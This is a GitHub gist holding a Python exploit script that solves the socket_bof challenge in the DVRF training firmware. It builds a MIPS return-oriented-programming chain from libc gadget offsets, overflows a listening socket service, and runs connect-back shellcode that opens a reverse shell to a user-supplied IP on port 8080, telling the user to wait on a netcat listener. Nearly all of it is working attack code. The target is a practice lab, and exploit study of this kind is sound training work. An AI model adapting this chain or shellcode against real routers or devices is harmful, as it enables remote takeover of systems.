Last active
June 2, 2016 19:01
-
-
Save gitpraetorianlabs/8919397cb43d41fa9679cace80502eaa to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket, sys , base64, struct, string, time | |
from getopt import getopt as GetOpt, GetoptError | |
def usage(): | |
print "" | |
print "Socket_bof solution for DVRF_v03" | |
print "By: Elvis Collado [b1ack0wl]" | |
print "" | |
print "Usage: %s -s source.ip -d dst.ip -p dst.port" % sys.argv[0] | |
print "" | |
print "\t-s Connect back IP" | |
print "\t-d Destination IP of Socket Listener" | |
print "\t-p Destination Port that socket_bof is listening on" | |
print "\t-h Print this Help Menu" | |
print "" | |
sys.exit(1) | |
try: | |
(opts, args) = GetOpt(sys.argv[1:], 's:d:p:h') | |
except GetoptError, e: | |
usage() | |
for opt, arg in opts: | |
if opt == "-s": | |
connectback_ip = arg.split(".") | |
for a in connectback_ip: | |
if int(a) == 0: | |
print "IP cannot have NULL Bytes :(" | |
sys.exit(1) | |
IP_1= struct.pack("<B",int(connectback_ip[0])) | |
IP_2= struct.pack("<B",int(connectback_ip[1])) | |
IP_3= struct.pack("<B",int(connectback_ip[2])) | |
IP_4= struct.pack("<B",int(connectback_ip[3])) | |
elif opt == "-d": | |
host = arg | |
elif opt == "-p": | |
port = int(arg) | |
else: | |
continue | |
try: | |
#create an AF_INET, STREAM socket (TCP) | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
except socket.error, msg: | |
print 'Failed to create socket. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1] | |
sys.exit(); | |
try: | |
remote_ip = socket.gethostbyname( host ) | |
except socket.gaierror: | |
#could not resolve | |
print 'Hostname could not be resolved. Exiting' | |
sys.exit() | |
#Connect to remote server | |
s.connect((remote_ip , port)) | |
# Shellcode From bowcaster | |
shellcode = string.join([ | |
"\xfa\xff\x0f\x24", # li t7,-6 | |
"\x27\x78\xe0\x01", # nor t7,t7,zero | |
"\xfd\xff\xe4\x21", # addi a0,t7,-3 | |
"\xfd\xff\xe5\x21", # addi a1,t7,-3 | |
"\xff\xff\x06\x28", # slti a2,zero,-1 | |
"\x57\x10\x02\x24", # li v0,4183 | |
"\x0c\x01\x01\x01", # syscall 0x40404 | |
"\xff\xff\xa2\xaf", # sw v0,-1(sp) | |
"\xff\xff\xa4\x8f", # lw a0,-1(sp) | |
"\xfd\xff\x0f\x3c", # lui t7,0xfffd | |
"\x27\x78\xe0\x01", # nor t7,t7,zero | |
"\xe0\xff\xaf\xaf", # sw t7,-32(sp) | |
# Connect back port 8080 | |
"\x1f\x90\x0e\x3c", # lui t6,0x901f | |
"\x1f\x90\xce\x35", # ori t6,t6,0x901f | |
"\xe4\xff\xae\xaf", # sw t6,-28(sp) | |
# IP Address | |
IP_3+IP_4+"\x0e\x3c", # lui t6,<ip> | |
IP_1+IP_2+"\xce\x35", # ori t6,t6,<ip> | |
"\xe6\xff\xae\xaf", # sw t6,-26(sp) | |
"\xe2\xff\xa5\x27", # addiu a1,sp,-30 | |
"\xef\xff\x0c\x24", # li t4,-17 | |
"\x27\x30\x80\x01", # nor a2,t4,zero | |
"\x4a\x10\x02\x24", # li v0,4170 | |
"\x0c\x01\x01\x01", # syscall 0x40404 | |
"\xfd\xff\x0f\x24", # li t7,-3 | |
"\x27\x78\xe0\x01", # nor t7,t7,zero | |
"\xff\xff\xa4\x8f", # lw a0,-1(sp) | |
"\x21\x28\xe0\x01", # move a1,t7 | |
"\xdf\x0f\x02\x24", # li v0,4063 | |
"\x0c\x01\x01\x01", # syscall 0x40404 | |
"\xff\xff\x10\x24", # li s0,-1 | |
"\xff\xff\xef\x21", # addi t7,t7,-1 | |
"\xfa\xff\xf0\x15", # bne t7,s0,68 <dup2_loop> | |
"\xff\xff\x06\x28", # slti a2,zero,-1 | |
"\x62\x69\x0f\x3c", # lui t7,0x6962 | |
"\x2f\x2f\xef\x35", # ori t7,t7,0x2f2f | |
"\xec\xff\xaf\xaf", # sw t7,-20(sp) | |
"\x73\x68\x0e\x3c", # lui t6,0x6873 | |
"\x6e\x2f\xce\x35", # ori t6,t6,0x2f6e | |
"\xf0\xff\xae\xaf", # sw t6,-16(sp) | |
"\xf4\xff\xa0\xaf", # sw zero,-12(sp) | |
"\xec\xff\xa4\x27", # addiu a0,sp,-20 | |
"\xf8\xff\xa4\xaf", # sw a0,-8(sp) | |
"\xfc\xff\xa0\xaf", # sw zero,-4(sp) | |
"\xf8\xff\xa5\x27", # addiu a1,sp,-8 | |
"\xab\x0f\x02\x24", # li v0,4011 | |
"\x0c\x01\x01\x01" # syscall 0x40404 | |
], '') | |
# sleep = 0x767142b0 qemu | |
# sleep = 0x2ab6d2b0 device | |
# libraries and offsets | |
libc = 0x2ab3e000 #0x766e5000 #0x2ab3e000 # | |
sleep_offset = 0x0002f2b0 | |
rop1_offset = 0x000377cc # to get s1 and s0 | |
rop2_offset = 0x000189ec # move t9, s0 jalr t9, nop | |
rop3_offset = 0x00033d8c # sp into a1 | |
rop4_offset = 0x0001fbcc # a1 into t9 then jump to t9 | |
# Craft Exploit | |
message = "A" * 51 # Padding | |
message += struct.pack("<L", libc+rop1_offset) # RA rop1 | |
message += "B" * 40 # padding for lw offset | |
#Gadget 2 - sleep | |
message += struct.pack("<L", libc+sleep_offset) #s0 0x28 | |
message += "MMMM" #s1 0x2c | |
message += struct.pack("<L", libc+rop2_offset) #ra 0x30 | |
# Gadget 3 | |
message += "C" * 60 | |
message += "0" * 4 # s0 | |
message += "1" * 4 # s1 | |
message += "2" * 4 # s2 | |
message += "3" * 4 # s3 | |
message += "4" * 4 # s4 | |
message += struct.pack("<L", libc+rop3_offset) # RA | |
# Gadget 4 | |
message += "D" * (72-48) | |
# XOR s0, s0 | |
message += struct.pack("<L",0x02108026) #xor s0 s0 | |
message += struct.pack("<L",0x02b5a826) | |
message += struct.pack("<L",0x02b5a826) | |
message += struct.pack("<L", 0xafb0fff8) # sw s0, -8(sp) | |
#One more Sleep for 5 seconds | |
# nop to shellcode | |
message += struct.pack("<L",0x02b5a826) * 8 # xor s5,s5 | |
message += struct.pack("<L", libc+rop4_offset) # RA then null | |
message += struct.pack("<L", 0xafa0fffc) # sw s0, -4(sp) | |
message += shellcode | |
''' | |
# a0 for sleep is 5 - first gadget | |
Gadget 1 | |
0x000377cc 3000bf8f lw ra, 0x30(sp) | |
0x000377d0 2c00b18f lw s1, 0x2c(sp) | |
0x000377d4 2800b08f lw s0, 0x28(sp) | |
0x000377d8 0800e003 jr ra | |
Gadget 2 | |
0x000189ec 21c80002 move t9, s0 | |
0x000189f0 09f82003 jalr t9 | |
0x000189f4 01000524 addiu a1, zero, 1 | |
0x000189f8 02000010 b 0x18a04 | |
Gadget 3 | |
0x00033d8c 1800a527 addiu a1, sp, 0x18 | |
0x00033d90 1000bc8f lw gp, 0x10(sp) | |
0x00033d94 4800bf8f lw ra, 0x48(sp) | |
0x00033d98 0800e003 jr ra | |
Gadget 4 | |
0x0001fbcc 21c8a000 move t9, a1 | |
0x0001fbd0 38008424 addiu a0, a0, 0x38 | |
0x0001fbd4 08002003 jr t9 | |
''' | |
try : | |
#Set the whole string | |
s.sendall(message) | |
except socket.error: | |
#Send failed | |
print 'Send failed' | |
sys.exit() | |
print 'Exploit Sent - Check your netcat listener in about 5 seconds.' | |
s.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment